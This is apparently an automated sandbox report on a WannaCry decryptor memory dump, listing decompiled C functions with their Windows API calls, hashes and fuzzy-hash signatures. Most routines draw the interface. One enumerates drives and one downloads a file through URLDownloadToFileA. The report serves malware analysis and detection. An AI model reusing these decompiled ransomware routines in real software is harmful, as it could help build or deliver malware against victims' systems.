                                                      • Opcode ID: a8225a914fe684002f5ebb33c6b5a83bf5030d8ce9238fcdcecfe8f5a0f25a9a
                                                      • Instruction ID: dc1b5eec0fc78afcb49772100b5c76d6e8760601cde25cb5382a27e7a1041640
                                                      • Opcode Fuzzy Hash: a8225a914fe684002f5ebb33c6b5a83bf5030d8ce9238fcdcecfe8f5a0f25a9a
                                                      • Instruction Fuzzy Hash: 8631A5B16006008BDB149F2E8D8169BB6D5FBC4720F18473EF929CB3C1EBB99951C755
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 61%
                                                      			E0040B780(signed int __ecx, CHAR* _a4, char* _a8) {
                                                      				intOrPtr _v12;
                                                      				void _v259;
                                                      				char _v260;
                                                      				char _v264;
                                                      				char _v284;
                                                      				char _t15;
                                                      				int _t19;
                                                      				CHAR* _t25;
                                                      				signed int _t26;
                                                      				char* _t40;
                                                      
                                                      				_t26 = __ecx;
                                                      				_t25 = _a4;
                                                      				CreateDirectoryA(_t25, 0);
                                                      				_t40 = _a8;
                                                      				asm("repne scasb");
                                                      				if( !(_t26 | 0xffffffff) == 1) {
                                                      					L4:
                                                      					return 0;
                                                      				} else {
                                                      					_t15 =  *0x421798; // 0x0
                                                      					_v260 = _t15;
                                                      					memset( &_v259, 0, 0x40 << 2);
                                                      					asm("stosw");
                                                      					asm("stosb");
                                                      					GetTempFileNameA(_t25, "t", 0,  &_v260);
                                                      					_t19 = DeleteUrlCacheEntry(_t40);
                                                      					_push(0);
                                                      					_push(0);
                                                      					_push( &_v264);
                                                      					_push(_t40);
                                                      					_push(0);
                                                      					L004133CE();
                                                      					if(_t19 != 0 || E0040B6A0(_t25,  &_v284, _v12) == 0) {
                                                      						DeleteFileA( &_v284);
                                                      						goto L4;
                                                      					} else {
                                                      						DeleteFileA( &_v284);
                                                      						return 1;
                                                      					}
                                                      				}
                                                      			}


                                                      APIs
                                                      • CreateDirectoryA.KERNEL32(?,00000000,?,76E83310,00000428), ref: 0040B793
                                                      • GetTempFileNameA.KERNEL32(?,004214DC,00000000,?), ref: 0040B7D4
                                                      • DeleteUrlCacheEntry.WININET(?), ref: 0040B7DB
                                                      • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 0040B7ED
                                                      • DeleteFileA.KERNEL32(?), ref: 0040B815
                                                      • DeleteFileA.KERNEL32(?), ref: 0040B82C
                                                        • Part of subcall function 0040B6A0: CreateDirectoryA.KERNEL32(?,00000000,?,76E83310,00000000,00000428), ref: 0040B6B4
                                                        • Part of subcall function 0040B6A0: DeleteFileA.KERNEL32(?), ref: 0040B6D9
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$Delete$CreateDirectory$CacheDownloadEntryNameTemp
                                                      • String ID:
                                                      • API String ID: 361195595-0
                                                      • Opcode ID: bc206aeca14df8ea71a261a63474c4c6f919be589c915fc96ea8b3c1b6d46284
                                                      • Instruction ID: f6bba9489874f0a6e7d9c3b0bbe4d647d3eb1ae806ee8fe5932772f512dcd3e1
                                                      • Opcode Fuzzy Hash: bc206aeca14df8ea71a261a63474c4c6f919be589c915fc96ea8b3c1b6d46284
                                                      • Instruction Fuzzy Hash: 24112B76100300BBE7209B60DC85FEB379CEBC4321F00C82DF659921D1DB79550987EA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00409A40(signed int* _a4, intOrPtr _a8) {
                                                      				intOrPtr _v4;
                                                      				intOrPtr* _v24;
                                                      				struct tagRECT _v40;
                                                      				intOrPtr _v56;
                                                      				intOrPtr _v64;
                                                      				char _v68;
                                                      				intOrPtr _v88;
                                                      				intOrPtr _t34;
                                                      				void* _t35;
                                                      				void* _t53;
                                                      				intOrPtr _t56;
                                                      
                                                      				 *[fs:0x0] = _t56;
                                                      				_v40.right = 0;
                                                      				_v40.top = 0x41679c;
                                                      				_v4 = 0;
                                                      				E00409D40( &(_v40.bottom), _a4, _a8);
                                                      				OffsetRect( &_v40,  ~( *_a4),  ~(_a4[1]));
                                                      				L00412D5E();
                                                      				L00413010();
                                                      				_t34 =  *_v24;
                                                      				_t35 =  *((intOrPtr*)( *( *_a4) + 0x64))(0, 0, _t34,  *((intOrPtr*)(_t34 - 8)),  &_v68, CreateRectRgn(_v40, _v40.top, _v40.right, _v40.bottom), _t53,  *[fs:0x0], E00414220, 0xffffffff);
                                                      				L00412D52();
                                                      				_v88 = 0x415c00;
                                                      				_v56 = 1;
                                                      				L00412D52();
                                                      				 *[fs:0x0] = _v64;
                                                      				return _t35;
                                                      			}

                                                      APIs
                                                      • OffsetRect.USER32(?,?,?), ref: 00409A9B
                                                      • CreateRectRgn.GDI32(?,?,?,?), ref: 00409AB5
                                                      • #1641.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00414220), ref: 00409AC0
                                                      • #5781.MFC42(0041679C,00000000), ref: 00409ACC
                                                      • #2414.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00414220,000000FF), ref: 00409AEB
                                                      • #2414.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00414220,000000FF), ref: 00409B04
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2414Rect$#1641#5781CreateOffset
                                                      • String ID:
                                                      • API String ID: 2675356817-0
                                                      • Opcode ID: 70d65907dd93b2958bf6993a897855ede509dea79e6a3755aa7cf1b2bfcc5a2d
                                                      • Instruction ID: 08eaaa51a6c0e03944d0349f6c05153d0be232de021c7e29130ffbf32961e4dd
                                                      • Opcode Fuzzy Hash: 70d65907dd93b2958bf6993a897855ede509dea79e6a3755aa7cf1b2bfcc5a2d
                                                      • Instruction Fuzzy Hash: 7621E9B5204701AFD304DF14C995FABB7E8EB88B04F108A1DF58697291CB78EC45CB96
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 62%
                                                      			E004034A0(void* __ecx) {
                                                      				intOrPtr _v0;
                                                      				int _v8;
                                                      				struct tagRECT _v28;
                                                      				intOrPtr _v32;
                                                      				intOrPtr _v36;
                                                      				char _v40;
                                                      				intOrPtr _v48;
                                                      				intOrPtr _v72;
                                                      				char* _t20;
                                                      				int _t23;
                                                      				void* _t45;
                                                      				intOrPtr _t48;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E00413620);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t48;
                                                      				_t45 = __ecx;
                                                      				GetClientRect( *(__ecx + 0x20),  &_v28);
                                                      				_push( *((intOrPtr*)(_t45 + 0xe8)));
                                                      				L00412D76();
                                                      				_t20 =  &_v40;
                                                      				_push(_t20);
                                                      				_v8 = 0;
                                                      				L00412D70();
                                                      				_t23 = PatBlt( *(_v0 + 4), 0, 0, _v28.left - _v36, _v28.top - _v32, 0xf00021);
                                                      				_push(_t20);
                                                      				L00412D70();
                                                      				_v72 = 0x415c00;
                                                      				_v40 = 1;
                                                      				L00412D52();
                                                      				 *[fs:0x0] = _v48;
                                                      				return _t23;
                                                      			}

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #5789$#2414#283ClientRect
                                                      • String ID:
                                                      • API String ID: 3728838672-0
                                                      • Opcode ID: e98b5bf81114f17ba521e4ef3fa09cb8d98efe28b03220bb61ec6d1cf8ad346c
                                                      • Instruction ID: 278ac0b80a8d68711b6ced8a2ef72b48c78586c4dd5442d856e74ad00dc42751
                                                      • Opcode Fuzzy Hash: e98b5bf81114f17ba521e4ef3fa09cb8d98efe28b03220bb61ec6d1cf8ad346c
                                                      • Instruction Fuzzy Hash: DB113375204741AFC314DF69D985F9BB7E8FB88714F008A1EB55AD3280DB78E8448B55
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 62%
                                                      			E00406940(void* __ecx) {
                                                      				intOrPtr _v0;
                                                      				int _v8;
                                                      				struct tagRECT _v28;
                                                      				intOrPtr _v32;
                                                      				intOrPtr _v36;
                                                      				char _v40;
                                                      				intOrPtr _v48;
                                                      				intOrPtr _v72;
                                                      				char* _t20;
                                                      				int _t23;
                                                      				void* _t45;
                                                      				intOrPtr _t48;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E00413E30);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t48;
                                                      				_t45 = __ecx;
                                                      				GetClientRect( *(__ecx + 0x20),  &_v28);
                                                      				_push( *((intOrPtr*)(_t45 + 0x824)));
                                                      				L00412D76();
                                                      				_t20 =  &_v40;
                                                      				_push(_t20);
                                                      				_v8 = 0;
                                                      				L00412D70();
                                                      				_t23 = PatBlt( *(_v0 + 4), 0, 0, _v28.left - _v36, _v28.top - _v32, 0xf00021);
                                                      				_push(_t20);
                                                      				L00412D70();
                                                      				_v72 = 0x415c00;
                                                      				_v40 = 1;
                                                      				L00412D52();
                                                      				 *[fs:0x0] = _v48;
                                                      				return _t23;
                                                      			}

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #5789$#2414#283ClientRect
                                                      • String ID:
                                                      • API String ID: 3728838672-0
                                                      • Opcode ID: 94bfcdd95dccd0665c65ca55dcb9de4da2bf1fb5487f65770e6e71c06e885f3f
                                                      • Instruction ID: 6a096d29dde81ab0807628e72033e91f5df492254ff76bbe7bc423a6b66a9ecc
                                                      • Opcode Fuzzy Hash: 94bfcdd95dccd0665c65ca55dcb9de4da2bf1fb5487f65770e6e71c06e885f3f
                                                      • Instruction Fuzzy Hash: CB113375204741AFC314DF69D985F9BB7E8FB8C714F008A1EB599D3280DB78D8058BA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 62%
                                                      			E00404EB0(void* __ecx) {
                                                      				intOrPtr _v0;
                                                      				int _v8;
                                                      				struct tagRECT _v28;
                                                      				intOrPtr _v32;
                                                      				intOrPtr _v36;
                                                      				char _v40;
                                                      				intOrPtr _v48;
                                                      				intOrPtr _v72;
                                                      				char* _t20;
                                                      				int _t23;
                                                      				void* _t45;
                                                      				intOrPtr _t48;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E00413870);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t48;
                                                      				_t45 = __ecx;
                                                      				GetClientRect( *(__ecx + 0x20),  &_v28);
                                                      				_push( *((intOrPtr*)(_t45 + 0x6c)));
                                                      				L00412D76();
                                                      				_t20 =  &_v40;
                                                      				_push(_t20);
                                                      				_v8 = 0;
                                                      				L00412D70();
                                                      				_t23 = PatBlt( *(_v0 + 4), 0, 0, _v28.left - _v36, _v28.top - _v32, 0xf00021);
                                                      				_push(_t20);
                                                      				L00412D70();
                                                      				_v72 = 0x415c00;
                                                      				_v40 = 1;
                                                      				L00412D52();
                                                      				 *[fs:0x0] = _v48;
                                                      				return _t23;
                                                      			}

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #5789$#2414#283ClientRect
                                                      • String ID:
                                                      • API String ID: 3728838672-0
                                                      • Opcode ID: 46ba31fa0516e8aa439e01c94c41dc17825091199510f8b9dc900171e6d2ebb4
                                                      • Instruction ID: d163b7983d6ef18c2c490a4321b6073019a727c2a72f1ecd8d9e2d5251008e6b
                                                      • Opcode Fuzzy Hash: 46ba31fa0516e8aa439e01c94c41dc17825091199510f8b9dc900171e6d2ebb4
                                                      • Instruction Fuzzy Hash: CB113375204701AFC314DF69D985F9BB7E8FB88714F008A1EB599D3280DB78D8058B55
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 76%
                                                      			E00404310(void* __ecx) {
                                                      				intOrPtr _v8;
                                                      				intOrPtr _v40;
                                                      				intOrPtr _v48;
                                                      				void* _v96;
                                                      				void* _v100;
                                                      				void* _v104;
                                                      				void* _v108;
                                                      				intOrPtr _v112;
                                                      				void* _v128;
                                                      				void* _v132;
                                                      				void* _t20;
                                                      				void* _t22;
                                                      				void* _t39;
                                                      				intOrPtr _t40;
                                                      				intOrPtr _t42;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E004137A8);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t42;
                                                      				_t39 = __ecx;
                                                      				if( *((intOrPtr*)(__ecx + 0x58)) == 0) {
                                                      					E004044C0(__ecx, 0);
                                                      				}
                                                      				L00412DD0();
                                                      				_t20 = _t39 + 0x48;
                                                      				_v8 = 0;
                                                      				L00412DCA();
                                                      				L00412DC4();
                                                      				L00412DBE();
                                                      				_t40 =  *((intOrPtr*)(_t39 + 0x40));
                                                      				_t22 =  *((intOrPtr*)(_v112 + 0x64))(0, 0, _t40,  *((intOrPtr*)(_t40 - 8)),  *((intOrPtr*)(_t39 + 0x64)), 1, _t20, _t39);
                                                      				_push(_t20);
                                                      				L00412DCA();
                                                      				_v40 = 0xffffffff;
                                                      				L00412DB8();
                                                      				 *[fs:0x0] = _v48;
                                                      				return _t22;
                                                      			}



















                                                      APIs
                                                      • #470.MFC42(?,00000000), ref: 0040433F
                                                      • #5789.MFC42 ref: 00404354
                                                      • #5875.MFC42(00000001), ref: 00404361
                                                      • #6172.MFC42(?,00000001), ref: 0040436E
                                                      • #5789.MFC42(00000000), ref: 0040438F
                                                      • #755.MFC42(00000000), ref: 004043A0
                                                        • Part of subcall function 004044C0: GetParent.USER32(?), ref: 004044D2
                                                        • Part of subcall function 004044C0: #2864.MFC42(00000000), ref: 004044D9
                                                        • Part of subcall function 004044C0: SendMessageA.USER32(?,00000031,00000000,00000000), ref: 004044E8
                                                        • Part of subcall function 004044C0: #2860.MFC42(00000000), ref: 004044EF
                                                        • Part of subcall function 004044C0: GetObjectA.GDI32(?,0000003C,?), ref: 00404503
                                                        • Part of subcall function 004044C0: CreateFontIndirectA.GDI32(?), ref: 00404513
                                                        • Part of subcall function 004044C0: #1641.MFC42(00000000), ref: 0040451D
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #5789$#1641#2860#2864#470#5875#6172#755CreateFontIndirectMessageObjectParentSend
                                                      • String ID:
                                                      • API String ID: 3301245081-0
                                                      • Opcode ID: fc0b145fd5a230e1fb0a5d7e30a8fbc0e65b4b60cc0ead88fd739261a0b8085f
                                                      • Instruction ID: 67bcf298962d36d7fa18f20cd84a87d7b1dd540c5c31f1d51ecab4020f7c2e08
                                                      • Opcode Fuzzy Hash: fc0b145fd5a230e1fb0a5d7e30a8fbc0e65b4b60cc0ead88fd739261a0b8085f
                                                      • Instruction Fuzzy Hash: 4611CE71104300AFC310EF14D841FDAB7A4EF94724F008A1EF5A6932D0CBB8A484CB62
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 46%
                                                      			E00403EB0(void* __eax, void* __ecx, intOrPtr _a4) {
                                                      				intOrPtr _t9;
                                                      
                                                      				_t9 = _a4;
                                                      				_push(_t9);
                                                      				_push(0x407);
                                                      				L00412CE6();
                                                      				L00412D88();
                                                      				_push(_t9);
                                                      				_push(0x408);
                                                      				L00412CE6();
                                                      				L00412D88();
                                                      				_push(_t9);
                                                      				_push(2);
                                                      				L00412CE6();
                                                      				L00412D88();
                                                      				return __eax;
                                                      			}





                                                      APIs
                                                      • #3092.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EBE
                                                      • #2642.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EC5
                                                      • #3092.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED2
                                                      • #2642.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED9
                                                      • #3092.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EE3
                                                      • #2642.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EEA
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2642#3092
                                                      • String ID:
                                                      • API String ID: 2547810013-0
                                                      • Opcode ID: e7ddd79a8d322918c2dba81477a0c723ed6b3b7cf26a0e59a3b85b9555a4b9c5
                                                      • Instruction ID: 4bb7b71439f2442b6829c2e1ec9f7e71f44d4abaae38a5a684cddd693ffb540b
                                                      • Opcode Fuzzy Hash: e7ddd79a8d322918c2dba81477a0c723ed6b3b7cf26a0e59a3b85b9555a4b9c5
                                                      • Instruction Fuzzy Hash: 46D0ECB179425427D9543273AE1BD9F4959AFE1B15B10052FB301EB2C2ECFC58A282AD
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00403A20(intOrPtr _a4, intOrPtr _a8) {
                                                      				union _ULARGE_INTEGER _v8;
                                                      				union _ULARGE_INTEGER _v16;
                                                      				intOrPtr _v20;
                                                      				union _ULARGE_INTEGER _v24;
                                                      				short _v28;
                                                      				short _v32;
                                                      				short _t23;
                                                      				short _t34;
                                                      				signed int _t47;
                                                      				unsigned int _t50;
                                                      
                                                      				if( *((intOrPtr*)(_a8 + 8)) != 0) {
                                                      					return 1;
                                                      				} else {
                                                      					_t50 = GetLogicalDrives();
                                                      					_t47 = 2;
                                                      					do {
                                                      						if((_t50 >> _t47 & 0x00000001) != 0) {
                                                      							_t23 =  *L" : "; // 0x3a0020
                                                      							_t34 =  *0x420760; // 0x20
                                                      							_v32 = _t23;
                                                      							_t7 = _t47 + 0x41; // 0x43
                                                      							_v28 = _t34;
                                                      							_v32 = _t7;
                                                      							_v28 = 0x5c;
                                                      							if(GetDriveTypeW( &_v32) != 5 && GetDiskFreeSpaceExW( &_v32,  &_v8,  &_v24,  &_v16) != 0 && (_v20 > 0 || _v24.LowPart > 0)) {
                                                      								_v28 = 0;
                                                      								E004026B0(_a4,  &_v32);
                                                      							}
                                                      						}
                                                      						_t47 = _t47 + 1;
                                                      					} while (_t47 <= 0x19);
                                                      					return 1;
                                                      				}
                                                      			}














                                                      APIs
                                                      • GetLogicalDrives.KERNEL32 ref: 00403A35
                                                      • GetDriveTypeW.KERNEL32 ref: 00403A7A
                                                      • GetDiskFreeSpaceExW.KERNEL32(0000005C,?,0000005C,?), ref: 00403A95
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DiskDriveDrivesFreeLogicalSpaceType
                                                      • String ID: : $\
                                                      • API String ID: 222820107-856521285
                                                      • Opcode ID: 8d838ba2e6f39d2646f0809dd41db9d52f5210801079b522eea1ca76c3ac80bf
                                                      • Instruction ID: 7a2fb974cbacd17fa61847377d7cab912bc040039a87a27a6beb81165ce83d4b
                                                      • Opcode Fuzzy Hash: 8d838ba2e6f39d2646f0809dd41db9d52f5210801079b522eea1ca76c3ac80bf
                                                      • Instruction Fuzzy Hash: 2D116D31614301ABD315DF15D884AABBBE8FBC8710F04882EF88597290E775E948CB9A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 89%
                                                      			E00406EF0(void* __ecx, char* _a4, void** _a8) {
                                                      				char* _v4;
                                                      				char _v8;
                                                      				void* _v12;
                                                      				char* _t14;
                                                      				char _t15;
                                                      				char* _t17;
                                                      				struct HWND__* _t18;
                                                      				char _t23;
                                                      
                                                      				_t14 = _a4;
                                                      				if(_t14[0xc] != 0x201) {
                                                      					L5:
                                                      					 *_a8 = 0;
                                                      					return _t14;
                                                      				}
                                                      				_t23 = _t14[0x18];
                                                      				_t15 = _t14[0x1c];
                                                      				_v8 = _t15;
                                                      				_t17 = _t15 - _t23 + 1;
                                                      				_v12 = _t23;
                                                      				_push(_t17);
                                                      				L00412CEC();
                                                      				_v4 = _t17;
                                                      				if(_t17 != 0) {
                                                      					_t18 = __ecx + 0x4c0;
                                                      					if(_t18 != 0) {
                                                      						_t18 =  *(_t18 + 0x20);
                                                      					}
                                                      					SendMessageA(_t18, 0x44b, 0,  &_v12);
                                                      					ShellExecuteA(0, "open", _v4, 0, 0, 5);
                                                      					_t14 = _v4;
                                                      					_push(_t14);
                                                      					L00412C98();
                                                      					goto L5;
                                                      				}
                                                      				return _t17;
                                                      			}












                                                      APIs
                                                      • #823.MFC42(?), ref: 00406F15
                                                      • SendMessageA.USER32(?,0000044B,00000000,?), ref: 00406F3F
                                                      • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000005), ref: 00406F57
                                                      • #825.MFC42(?), ref: 00406F62
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #823#825ExecuteMessageSendShell
                                                      • String ID: open
                                                      • API String ID: 1093558810-2758837156
                                                      • Opcode ID: b3555fc8e5306fa9c71381116aefee59a3ba052e6f8451af1c149dcc11f64dcc
                                                      • Instruction ID: 5f9a2cd0b307edef7ddb37fa3a9b8e73568683458afc550aac563bbb23be8fd8
                                                      • Opcode Fuzzy Hash: b3555fc8e5306fa9c71381116aefee59a3ba052e6f8451af1c149dcc11f64dcc
                                                      • Instruction Fuzzy Hash: 0C0148B0A50301AFE610DF24DD4AF5B77E8AB84B14F00C42AF9499B291E6B4E814CB96
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 67%
                                                      			E004030E0(intOrPtr __ecx, intOrPtr _a4) {
                                                      				char _v12;
                                                      				intOrPtr _v16;
                                                      				intOrPtr _v20;
                                                      				intOrPtr _t30;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E004135B3);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t30;
                                                      				_push(__ecx);
                                                      				_push(_a4);
                                                      				_push(0x8a);
                                                      				_v16 = __ecx;
                                                      				L00412C92();
                                                      				_v12 = 0;
                                                      				L00412C8C();
                                                      				 *((intOrPtr*)(__ecx + 0x60)) = 0x415b28;
                                                      				_v12 = 1;
                                                      				L00412C8C();
                                                      				 *((intOrPtr*)(__ecx + 0xa0)) = 0x415a58;
                                                      				 *((intOrPtr*)(__ecx + 0xe4)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0xe0)) = 0x415a44;
                                                      				 *((intOrPtr*)(__ecx + 0xf0)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0xec)) = 0x415a30;
                                                      				 *((intOrPtr*)(__ecx)) = 0x415958;
                                                      				 *((intOrPtr*)(__ecx + 0xf4)) = 0;
                                                      				 *[fs:0x0] = _v20;
                                                      				return __ecx;
                                                      			}








                                                      APIs
                                                      • #324.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403109
                                                      • #567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403119
                                                      • #567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403131
                                                      Strings
                                                      Memory Dump Source
